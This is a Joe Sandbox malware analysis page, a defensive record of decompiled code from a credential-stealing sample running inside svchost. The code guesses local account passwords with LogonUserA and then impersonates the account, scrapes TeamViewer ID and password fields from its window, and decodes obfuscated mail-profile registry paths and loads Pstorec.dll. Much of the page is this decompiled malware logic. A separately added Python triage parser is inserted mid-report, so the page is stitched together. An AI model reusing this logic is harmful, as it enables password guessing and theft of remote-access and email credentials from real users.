                                                                                                                                        control_flow_graph 113 bc015d2-bc015e7 114 bc015e9-bc01624 113->114 115 bc01627-bc0163b call bc09b51 114->115 118 bc0163d-bc01644 115->118 119 bc01646-bc01652 lstrcmpiA 118->119 120 bc01658-bc0166f LogonUserA 118->120 119->120 121 bc01789-bc0178d 119->121 122 bc01704-bc01733 LoadUserProfileA 120->122 123 bc01675-bc016a4 call bc091e5 lstrlenA LCMapStringA 120->123 121->114 124 bc01793-bc01797 121->124 125 bc01735-bc0173a 122->125 126 bc0174a 122->126 134 bc016a6-bc016bb LogonUserA 123->134 135 bc016c8-bc016d1 call bc08d3d 123->135 128 bc01741-bc01748 125->128 129 bc0173c 125->129 130 bc0174d-bc01758 ImpersonateLoggedOnUser 126->130 128->130 129->128 132 bc0175a call bc01153 130->132 133 bc0176f-bc01772 130->133 141 bc0175f-bc01765 RevertToSelf 132->141 138 bc01780-bc01783 CloseHandle 133->138 139 bc01774-bc0177a UnloadUserProfile 133->139 134->135 137 bc016bd-bc016c6 call bc08d3d 134->137 145 bc016d4-bc016ec LogonUserA 135->145 137->122 138->121 139->138 141->133 145->122 146 bc016ee-bc016f9 145->146 146->145 147 bc016fb-bc016fe 146->147 147->121 147->122
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC015D2(void* __edx) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				CHAR* _v12;
                                                                                                                                        				CHAR* _v16;
                                                                                                                                        				CHAR* _v20;
                                                                                                                                        				CHAR* _v24;
                                                                                                                                        				CHAR* _v28;
                                                                                                                                        				CHAR* _v32;
                                                                                                                                        				CHAR* _v40;
                                                                                                                                        				CHAR* _v44;
                                                                                                                                        				char _v48;
                                                                                                                                        				CHAR* _v52;
                                                                                                                                        				char* _v56;
                                                                                                                                        				char* _v60;
                                                                                                                                        				char* _v64;
                                                                                                                                        				char* _v68;
                                                                                                                                        				char* _v72;
                                                                                                                                        				char* _v76;
                                                                                                                                        				char* _v80;
                                                                                                                                        				char* _v84;
                                                                                                                                        				CHAR* _t63;
                                                                                                                                        				int _t65;
                                                                                                                                        				char* _t67;
                                                                                                                                        				int _t69;
                                                                                                                                        				intOrPtr _t72;
                                                                                                                                        				int _t80;
                                                                                                                                        				void* _t88;
                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                        				void* _t91;
                                                                                                                                        
                                                                                                                                        				_t88 = __edx;
                                                                                                                                        				_t90 =  *0xbc10d08; // 0x325a4b0
                                                                                                                                        				do {
                                                                                                                                        					_v84 = "SeImpersonatePrivilege";
                                                                                                                                        					_v80 = "SeTcbPrivilege";
                                                                                                                                        					_v76 = "SeChangeNotifyPrivilege";
                                                                                                                                        					_v72 = "SeCreateTokenPrivilege";
                                                                                                                                        					_v68 = "SeBackupPrivilege";
                                                                                                                                        					_v64 = "SeRestorePrivilege";
                                                                                                                                        					_v60 = "SeIncreaseQuotaPrivilege";
                                                                                                                                        					_v56 = "SeAssignPrimaryTokenPrivilege";
                                                                                                                                        					_v52 = 0;
                                                                                                                                        					_v12 = 0;
                                                                                                                                        					do {
                                                                                                                                        						E0BC09B51( *((intOrPtr*)(_t91 + _v12 * 4 - 0x50))); // executed
                                                                                                                                        						_v12 =  &(_v12[1]);
                                                                                                                                        					} while (_v12 < 9);
                                                                                                                                        					_t63 =  *0xbc10d04; // 0x3206648
                                                                                                                                        					if(_t63 == 0) {
                                                                                                                                        						L5:
                                                                                                                                        						_v8 = 0;
                                                                                                                                        						_t65 = LogonUserA( *(_t90 + 4), 0,  *(_t90 + 4), 2, 0,  &_v8);
                                                                                                                                        						_v16 = _t65;
                                                                                                                                        						if(_t65 != 0) {
                                                                                                                                        							L13:
                                                                                                                                        							_v48 = 0x20;
                                                                                                                                        							_v44 = 1;
                                                                                                                                        							_v40 =  *(_t90 + 4);
                                                                                                                                        							_t67 =  &_v48;
                                                                                                                                        							_v32 = 0;
                                                                                                                                        							_v28 = 0;
                                                                                                                                        							_v24 = 0;
                                                                                                                                        							_v20 = 0;
                                                                                                                                        							__imp__LoadUserProfileA(_v8, _t67);
                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                        								_v16 = 0;
                                                                                                                                        							} else {
                                                                                                                                        								_t72 = _v20;
                                                                                                                                        								if(_t72 != 0) {
                                                                                                                                        									 *0xbc10010 = _t72;
                                                                                                                                        								}
                                                                                                                                        								_v16 = 1;
                                                                                                                                        							}
                                                                                                                                        							if(ImpersonateLoggedOnUser(_v8) != 0) {
                                                                                                                                        								E0BC01153(_t88);
                                                                                                                                        								RevertToSelf();
                                                                                                                                        								 *0xbc10010 = 0x80000001;
                                                                                                                                        							}
                                                                                                                                        							if(_v16 != 0) {
                                                                                                                                        								__imp__UnloadUserProfile(_v8, _v20);
                                                                                                                                        							}
                                                                                                                                        							_t69 = CloseHandle(_v8);
                                                                                                                                        						} else {
                                                                                                                                        							_v12 = E0BC091E5( *(_t90 + 4));
                                                                                                                                        							if(LCMapStringA(0x400, 0x100,  *(_t90 + 4), lstrlenA( *(_t90 + 4)), _v12, _t74) == 0) {
                                                                                                                                        								L9:
                                                                                                                                        								E0BC08D3D(_v12);
                                                                                                                                        								_v12 = 0;
                                                                                                                                        								while(1) {
                                                                                                                                        									_t37 =  &(_v12[0xbc10100]); // 0x500bc0d3
                                                                                                                                        									_t69 = LogonUserA( *(_t90 + 4), 0,  *_t37, 2, 0,  &_v8);
                                                                                                                                        									if(_t69 != 0) {
                                                                                                                                        										goto L13;
                                                                                                                                        									}
                                                                                                                                        									_v12 =  &(_v12[4]);
                                                                                                                                        									if(_v12 < 0x7d0) {
                                                                                                                                        										continue;
                                                                                                                                        									} else {
                                                                                                                                        										if(_v16 != 0) {
                                                                                                                                        											goto L13;
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        									goto L23;
                                                                                                                                        								}
                                                                                                                                        								goto L13;
                                                                                                                                        							} else {
                                                                                                                                        								_t80 = LogonUserA( *(_t90 + 4), 0, _v12, 2, 0,  &_v8);
                                                                                                                                        								_v16 = _t80;
                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                        									goto L9;
                                                                                                                                        								} else {
                                                                                                                                        									E0BC08D3D(_v12);
                                                                                                                                        									goto L13;
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					} else {
                                                                                                                                        						_t69 = lstrcmpiA(_t63,  *(_t90 + 4));
                                                                                                                                        						if(_t69 != 0) {
                                                                                                                                        							goto L5;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					L23:
                                                                                                                                        					_t90 =  *_t90;
                                                                                                                                        				} while ( *_t90 != 0);
                                                                                                                                        				return _t69;
                                                                                                                                        			}

Address column for the listing above (0x0bc015d2 to 0x0bc01797, plus 0x00000000 entries); the corresponding instruction text was not extracted.

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC09B51: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0BC09B73
                                                                                                                                          • Part of subcall function 0BC09B51: GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B83
                                                                                                                                          • Part of subcall function 0BC09B51: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B8A
                                                                                                                                          • Part of subcall function 0BC09B51: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 0BC09BBA
                                                                                                                                          • Part of subcall function 0BC09B51: CloseHandle.KERNEL32(?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09BCA
                                                                                                                                        • lstrcmpiA.KERNEL32(03206648,?), ref: 0BC0164A
                                                                                                                                        • LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,?), ref: 0BC01668
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC01684
                                                                                                                                        • LCMapStringA.KERNEL32(00000400,00000100,?,00000000,00000009,00000000), ref: 0BC0169C
                                                                                                                                        • LogonUserA.ADVAPI32(?,00000000,00000009,00000002,00000000,?), ref: 0BC016B4
                                                                                                                                        • LogonUserA.ADVAPI32(?,00000000,500BC0D3,00000002,00000000,?), ref: 0BC016E8
                                                                                                                                        • LoadUserProfileA.USERENV(?,00000020), ref: 0BC0172B
                                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 0BC01750
                                                                                                                                        • RevertToSelf.ADVAPI32 ref: 0BC0175F
                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0BC0177A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0BC01783
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: User$Logon$CloseHandleProcessProfileToken$AdjustCurrentFreeImpersonateLoadLocalLoggedLookupOpenPrivilegePrivilegesRevertSelfStringUnloadValuelstrcmpilstrlen
                                                                                                                                        • String ID: $SeAssignPrimaryTokenPrivilege$SeBackupPrivilege$SeChangeNotifyPrivilege$SeCreateTokenPrivilege$SeImpersonatePrivilege$SeIncreaseQuotaPrivilege$SeRestorePrivilege$SeTcbPrivilege
                                                                                                                                        • API String ID: 4267542777-3650065877
                                                                                                                                        • Opcode ID: eabcc6bc4419709b07787e395f7c4e9f4bac18055a044f2d9d9abc7639637f12
                                                                                                                                        • Instruction ID: 2688def369b826e0bb415bcdc4bccbbd9e3b57f490e3da98be45c5f6b1bed1dd
                                                                                                                                        • Opcode Fuzzy Hash: eabcc6bc4419709b07787e395f7c4e9f4bac18055a044f2d9d9abc7639637f12
                                                                                                                                        • Instruction Fuzzy Hash: A95115B1D20209EFDF219F9AE849A9EFBF9FF44704F244559E211B6290DB719A80DF10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 4.31%
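The API list above records the credential-check routine in call order: a subcall (0BC09B51) enables token privileges through LookupPrivilegeValueA and AdjustTokenPrivileges, the function then compares a username with lstrcmpiA, calls LogonUserA up to three times with dwLogonType 2 (LOGON32_LOGON_INTERACTIVE) and dwLogonProvider 0, lowercases the candidate string between attempts with LCMapStringA (0x100 is LCMAP_LOWERCASE), and the profile and impersonation calls (LoadUserProfileA, ImpersonateLoggedOnUser, RevertToSelf, UnloadUserProfile) follow. The Python below is an added triage helper, not code from the Joe Sandbox report or from the sample: it parses these report "APIs" and "String ID" lines (the line grammar is inferred from the lines on this page and is an assumption about the report format), resolves the LogonUserA logon type, and flags the LogonUser -> Impersonate -> Revert sequence. The sample input is the API block copied from above; the Win32 constant names are the standard ones.

```python
import re
from typing import List, NamedTuple, Optional, Set, Tuple

# Constructed sample input: the "APIs" block of this report for the function at
# 0BC015D2, copied from the page so the parser can be exercised offline.
API_LINES = """\
  • Part of subcall function 0BC09B51: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0BC09B73
  • Part of subcall function 0BC09B51: GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B83
  • Part of subcall function 0BC09B51: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B8A
  • Part of subcall function 0BC09B51: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 0BC09BBA
  • Part of subcall function 0BC09B51: CloseHandle.KERNEL32(?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09BCA
• lstrcmpiA.KERNEL32(03206648,?), ref: 0BC0164A
• LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,?), ref: 0BC01668
• lstrlenA.KERNEL32(?), ref: 0BC01684
• LCMapStringA.KERNEL32(00000400,00000100,?,00000000,00000009,00000000), ref: 0BC0169C
• LogonUserA.ADVAPI32(?,00000000,00000009,00000002,00000000,?), ref: 0BC016B4
• LogonUserA.ADVAPI32(?,00000000,500BC0D3,00000002,00000000,?), ref: 0BC016E8
• LoadUserProfileA.USERENV(?,00000020), ref: 0BC0172B
• ImpersonateLoggedOnUser.ADVAPI32(?), ref: 0BC01750
• RevertToSelf.ADVAPI32 ref: 0BC0175F
• UnloadUserProfile.USERENV(?,?), ref: 0BC0177A
• CloseHandle.KERNEL32(?), ref: 0BC01783
  • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
"""

# Constructed sample input: the "String ID" line of the same function, copied from the page.
STRING_ID_LINE = ("• String ID: $SeAssignPrimaryTokenPrivilege$SeBackupPrivilege"
                  "$SeChangeNotifyPrivilege$SeCreateTokenPrivilege$SeImpersonatePrivilege"
                  "$SeIncreaseQuotaPrivilege$SeRestorePrivilege$SeTcbPrivilege")

# Line grammar inferred from the lines on this page (assumption about the report format):
#   [Part of subcall function <hex>:] <Api>.<MODULE>[(<arg>,...)][,] ref: <hex>
API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# dwLogonType values accepted by LogonUserA (Win32 constants).
LOGON_TYPES = {
    2: "LOGON32_LOGON_INTERACTIVE",
    3: "LOGON32_LOGON_NETWORK",
    4: "LOGON32_LOGON_BATCH",
    5: "LOGON32_LOGON_SERVICE",
    8: "LOGON32_LOGON_NETWORK_CLEARTEXT",
    9: "LOGON32_LOGON_NEW_CREDENTIALS",
}


class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[Optional[int], ...]  # None where the report prints '?'
    ref: int                         # address of the call instruction
    subcall: Optional[int]           # callee address when reported as part of a subcall


def _parse_args(raw: Optional[str]) -> Tuple[Optional[int], ...]:
    if raw is None or not raw.strip():
        return ()
    return tuple(None if tok.strip() == "?" else int(tok, 16) for tok in raw.split(","))


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse one 'APIs' block into calls, in the order the report lists them."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_RE.match(line)
        if m is None:
            raise ValueError("unrecognised API line: %r" % line)
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"),
                             args=_parse_args(m.group("args")), ref=int(m.group("ref"), 16),
                             subcall=int(sub, 16) if sub else None))
    return calls


def logon_user_types(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """(ref, dwLogonType name) for every direct LogonUserA call with a resolved 4th argument."""
    out = []
    for c in calls:
        if c.subcall is None and c.api == "LogonUserA" and len(c.args) > 3 and c.args[3] is not None:
            out.append((c.ref, LOGON_TYPES.get(c.args[3], "unknown(%d)" % c.args[3])))
    return out


def has_credential_validation_chain(calls: List[ApiCall]) -> bool:
    """True when LogonUserA is followed (in order) by ImpersonateLoggedOnUser and RevertToSelf."""
    wanted = ["LogonUserA", "ImpersonateLoggedOnUser", "RevertToSelf"]
    idx = 0
    for c in calls:
        if c.subcall is None and c.api == wanted[idx]:
            idx += 1
            if idx == len(wanted):
                return True
    return False


def privilege_adjusting_subcalls(calls: List[ApiCall]) -> Set[int]:
    """Subcall addresses that reach AdjustTokenPrivileges (privilege enabling helpers)."""
    return {c.subcall for c in calls if c.subcall is not None and c.api == "AdjustTokenPrivileges"}


def parse_string_ids(line: str) -> List[str]:
    """Split a '$'-separated 'String ID' line into the individual strings."""
    _, _, body = line.partition("String ID:")
    return [s for s in body.strip().split("$") if s]


if __name__ == "__main__":
    calls = parse_api_block(API_LINES)
    for ref, name in logon_user_types(calls):
        print("LogonUserA @ %08X: %s" % (ref, name))
    print("credential validation chain:", has_credential_validation_chain(calls))
    print("privilege helpers:", ", ".join("%08X" % a for a in privilege_adjusting_subcalls(calls)))
    print("privileges referenced:", ", ".join(parse_string_ids(STRING_ID_LINE)))
```

The same parser can be pointed at the API block of any other function on the page; in a triage workflow the useful signal is the ordered sequence (privilege enabling, repeated interactive LogonUserA, then impersonation), not any single API name.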

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E0BC06F5F(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				struct HWND__* _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				void* _v16;
                                                                                                                                        				struct HWND__* _v20;
                                                                                                                                        				void* _v24;
                                                                                                                                        				intOrPtr _v28;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				intOrPtr _t38;
                                                                                                                                        				struct HWND__* _t42;
                                                                                                                                        				struct HWND__* _t48;
                                                                                                                                        				struct HWND__* _t49;
                                                                                                                                        				struct HWND__* _t50;
                                                                                                                                        				int _t51;
                                                                                                                                        				char* _t52;
                                                                                                                                        				struct HWND__* _t66;
                                                                                                                                        				long _t67;
                                                                                                                                        				void* _t80;
                                                                                                                                        				int _t86;
                                                                                                                                        				void* _t89;
                                                                                                                                        
                                                                                                                                        				_t38 = E0BC08C9C(_a4, __edx, __eflags, 0x86);
                                                                                                                                        				_pop(_t80);
                                                                                                                                        				_push(0xc0);
                                                                                                                                        				_t86 = 0x40;
                                                                                                                                        				_v28 = _t38;
                                                                                                                                        				_v12 = LocalAlloc(_t86, ??);
                                                                                                                                        				_v16 = LocalAlloc(_t86, 0xc0);
                                                                                                                                        				_v24 = LocalAlloc(_t86, 0xc0);
                                                                                                                                        				_t42 = FindWindowExA(0, 0, 0, "TeamViewer"); // executed
                                                                                                                                        				if(_t42 == 0) {
                                                                                                                                        					L13:
                                                                                                                                        					E0BC08D0C(_a4, _v28, _t97);
                                                                                                                                        					E0BC08D3D(_v12);
                                                                                                                                        					E0BC08D3D(_v16);
                                                                                                                                        					return E0BC08D3D(_v24);
                                                                                                                                        				}
                                                                                                                                        				_t48 = FindWindowExA(_t42, 0, "#32770", 0);
                                                                                                                                        				_v20 = _t48;
                                                                                                                                        				if(_t48 == 0) {
                                                                                                                                        					goto L13;
                                                                                                                                        				}
                                                                                                                                        				_t49 = FindWindowExA(_t48, 0, "Edit", 0);
                                                                                                                                        				_v8 = _t49;
                                                                                                                                        				if(_t49 == 0) {
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(0);
                                                                                                                                        					while(1) {
                                                                                                                                        						_t50 = FindWindowExA(_v20, ??, ??, ??);
                                                                                                                                        						_v8 = _t50;
                                                                                                                                        						__eflags = _t50;
                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						_t51 = GetClassNameA(_v8, _v24, _t86);
                                                                                                                                        						__eflags = _t51;
                                                                                                                                        						if(_t51 == 0) {
                                                                                                                                        							L9:
                                                                                                                                        							_push(0);
                                                                                                                                        							_push(0);
                                                                                                                                        							_push(_v8);
                                                                                                                                        							continue;
                                                                                                                                        						}
                                                                                                                                        						_t52 = StrStrIA(_v24, "ATL");
                                                                                                                                        						__eflags = _t52;
                                                                                                                                        						if(_t52 == 0) {
                                                                                                                                        							SendMessageW(_v8, 0xd, _t86, 0xbc0e554);
                                                                                                                                        							_v12 = E0BC09BE0(_t80, 0xbc0e554, 0xffffffff);
                                                                                                                                        							E0BC08D3D(0xbc0e554);
                                                                                                                                        							SendMessageW(FindWindowExA(_v20, _v8, 0, 0), 0xd, 0x40, 0xbc0e554);
                                                                                                                                        							_v16 = E0BC09BE0(_t80, 0xbc0e554, 0xffffffff);
                                                                                                                                        							E0BC08D3D(0xbc0e554);
                                                                                                                                        							_t84 = _a4;
                                                                                                                                        							_v20 = 0xbeef0000;
                                                                                                                                        							E0BC08A41( &_v20, _t80, _a4, 4);
                                                                                                                                        							E0BC08C6D(_a4, _t80, _v12);
                                                                                                                                        							E0BC08C6D(_t84, _t80, _v16);
                                                                                                                                        							_t89 = _t89 + 0x24;
                                                                                                                                        							goto L13;
                                                                                                                                        						}
                                                                                                                                        						goto L9;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					SendMessageA(_t49, 0xd, _t86, _v12);
                                                                                                                                        					_t66 = FindWindowExA(_v20, _v8, "Edit", 0);
                                                                                                                                        					if(_t66 != 0) {
                                                                                                                                        						_t67 = SendMessageA(_t66, 0xd, 0x40, _v16);
                                                                                                                                        						_t97 = _t67;
                                                                                                                                        						if(_t67 != 0) {
                                                                                                                                        							_t85 = _a4;
                                                                                                                                        							_v20 = 0xbeef0000;
                                                                                                                                        							E0BC08A41( &_v20, _t80, _a4, 4);
                                                                                                                                        							E0BC08C6D(_a4, _t80, _v12);
                                                                                                                                        							E0BC08C6D(_t85, _t80, _v16);
                                                                                                                                        							_t89 = _t89 + 0xc;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}
                                                                                                                                        0x0bc06f70
                                                                                                                                        0x0bc06f7b
                                                                                                                                        0x0bc06f81
                                                                                                                                        0x0bc06f84
                                                                                                                                        0x0bc06f86
                                                                                                                                        0x0bc06f8d
                                                                                                                                        0x0bc06f94
                                                                                                                                        0x0bc06fa9
                                                                                                                                        0x0bc06fac
                                                                                                                                        0x0bc06fb0
                                                                                                                                        0x0bc070f6
                                                                                                                                        0x0bc070fc
                                                                                                                                        0x0bc07104
                                                                                                                                        0x0bc0710c
                                                                                                                                        0x0bc07120
                                                                                                                                        0x0bc07120
                                                                                                                                        0x0bc06fbe
                                                                                                                                        0x0bc06fc0
                                                                                                                                        0x0bc06fc5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06fd3
                                                                                                                                        0x0bc06fd5
                                                                                                                                        0x0bc06fda
                                                                                                                                        0x0bc07043
                                                                                                                                        0x0bc07044
                                                                                                                                        0x0bc07045
                                                                                                                                        0x0bc07070
                                                                                                                                        0x0bc07073
                                                                                                                                        0x0bc07075
                                                                                                                                        0x0bc07078
                                                                                                                                        0x0bc0707a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0704f
                                                                                                                                        0x0bc07055
                                                                                                                                        0x0bc07057
                                                                                                                                        0x0bc0706b
                                                                                                                                        0x0bc0706b
                                                                                                                                        0x0bc0706c
                                                                                                                                        0x0bc0706d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0706d
                                                                                                                                        0x0bc07061
                                                                                                                                        0x0bc07067
                                                                                                                                        0x0bc07069
                                                                                                                                        0x0bc07090
                                                                                                                                        0x0bc0709b
                                                                                                                                        0x0bc0709e
                                                                                                                                        0x0bc070b8
                                                                                                                                        0x0bc070c3
                                                                                                                                        0x0bc070c6
                                                                                                                                        0x0bc070cb
                                                                                                                                        0x0bc070d3
                                                                                                                                        0x0bc070da
                                                                                                                                        0x0bc070e4
                                                                                                                                        0x0bc070ee
                                                                                                                                        0x0bc070f3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc070f3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc07069
                                                                                                                                        0x0bc06fdc
                                                                                                                                        0x0bc06fe9
                                                                                                                                        0x0bc06ff7
                                                                                                                                        0x0bc06ffb
                                                                                                                                        0x0bc07009
                                                                                                                                        0x0bc0700b
                                                                                                                                        0x0bc0700d
                                                                                                                                        0x0bc07013
                                                                                                                                        0x0bc0701b
                                                                                                                                        0x0bc07022
                                                                                                                                        0x0bc0702c
                                                                                                                                        0x0bc07036
                                                                                                                                        0x0bc0703b
                                                                                                                                        0x0bc0703b
                                                                                                                                        0x0bc0700d
                                                                                                                                        0x0bc06ffb

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000C0), ref: 0BC06F89
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000C0), ref: 0BC06F90
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000C0), ref: 0BC06F97
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,00000000,TeamViewer), ref: 0BC06FAC
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 0BC06FBE
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,Edit,00000000), ref: 0BC06FD3
                                                                                                                                        • SendMessageA.USER32(00000000,0000000D,00000040,?), ref: 0BC06FE9
                                                                                                                                        • FindWindowExA.USER32(?,?,Edit,00000000), ref: 0BC06FF7
                                                                                                                                        • SendMessageA.USER32(00000000,0000000D,00000040,?), ref: 0BC07009
                                                                                                                                          • Part of subcall function 0BC08C6D: lstrlenA.KERNEL32(00000000,00000000,?), ref: 0BC08C7D
                                                                                                                                        • FindWindowExA.USER32(?,00000000,00000000,00000000), ref: 0BC07073
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindWindow$AllocLocal$MessageSend$lstrlen
                                                                                                                                        • String ID: #32770$ATL$Edit$TeamViewer
                                                                                                                                        • API String ID: 3493446068-4057567464
                                                                                                                                        • Opcode ID: f8a4cbdceacb77968db407f9164c01936af883f031721ff24900da2acfb6eaef
                                                                                                                                        • Instruction ID: cdce75e9f46029fe121bd25e3e9883ad297908593716a1f56a88320794e40eba
                                                                                                                                        • Opcode Fuzzy Hash: f8a4cbdceacb77968db407f9164c01936af883f031721ff24900da2acfb6eaef
                                                                                                                                        • Instruction Fuzzy Hash: B35151B1E70219BEDF106BE58C85EAF7B7DEF44294F104961F610B21D0DE759E10ABA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E0BC06007(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				intOrPtr _v20;
                                                                                                                                        				intOrPtr _v24;
                                                                                                                                        				intOrPtr _v28;
                                                                                                                                        				void* _v32;
                                                                                                                                        				void* _v36;
                                                                                                                                        				void* _v40;
                                                                                                                                        				void* _v44;
                                                                                                                                        				void* _v48;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				void* _t32;
                                                                                                                                        				void* _t33;
                                                                                                                                        				void* _t34;
                                                                                                                                        				void* _t35;
                                                                                                                                        				void* _t36;
                                                                                                                                        				struct HINSTANCE__* _t38;
                                                                                                                                        				void* _t44;
                                                                                                                                        				_Unknown_base(*)()* _t60;
                                                                                                                                        				intOrPtr* _t63;
                                                                                                                                        				CHAR* _t65;
                                                                                                                                        				void* _t78;
                                                                                                                                        				void* _t86;
                                                                                                                                        				intOrPtr* _t87;
                                                                                                                                        				void* _t88;
                                                                                                                                        
                                                                                                                                        				_t78 = __edx;
                                                                                                                                        				_t32 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\u22L3H\\uARbvvr\\uT1 s33vAQR TDQD5Hp\\s33vAQRg");
                                                                                                                                        				_v48 = _t32;
                                                                                                                                        				_t65 = " ";
                                                                                                                                        				_v12 = _t32;
                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                        					_v12 = _t65;
                                                                                                                                        				}
                                                                                                                                        				_t33 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\kLQEv9g Ke\\JAppHQRaHpgLvQ\\kLQEv9g THggD5LQ5 6AfgwgRHO\\Ipv2LbHg\\TL3pvgv2R uARbvvr 1QRHpQHR 6HRRLQ5g");
                                                                                                                                        				_v44 = _t33;
                                                                                                                                        				_v16 = _t33;
                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                        					_v16 = _t65;
                                                                                                                                        				}
                                                                                                                                        				_t34 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\kLQEv9g Ke\\JAppHQRaHpgLvQ\\kLQEv9g THggD5LQ5 6AfgwgRHO\\Ipv2LbHg\\uARbvvr");
                                                                                                                                        				_v40 = _t34;
                                                                                                                                        				_v20 = _t34;
                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                        					_v20 = _t65;
                                                                                                                                        				}
                                                                                                                                        				_t35 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\u22L3H\\h8.G\\uARbvvr\\Ipv2LbHg\\uARbvvr");
                                                                                                                                        				_v36 = _t35;
                                                                                                                                        				_v24 = _t35;
                                                                                                                                        				if(_t35 == 0) {
                                                                                                                                        					_v24 = _t65;
                                                                                                                                        				}
                                                                                                                                        				_t36 = E0BC088C9("6v2R9DpH\\TL3pvgv2R\\u22L3H\\hW.G\\uARbvvr\\Ipv2LbHg\\uARbvvr");
                                                                                                                                        				_v32 = _t36;
                                                                                                                                        				_v28 = _t36;
                                                                                                                                        				_t95 = _t36;
                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                        					_v28 = _t65;
                                                                                                                                        				}
                                                                                                                                        				_t84 = _a4;
                                                                                                                                        				_t86 = E0BC08C9C(_a4, _t78, _t95, 0x5e);
                                                                                                                                        				 *_t87 = "Pstorec.dll";
                                                                                                                                        				_t38 = LoadLibraryA(??);
                                                                                                                                        				if(_t38 != 0) {
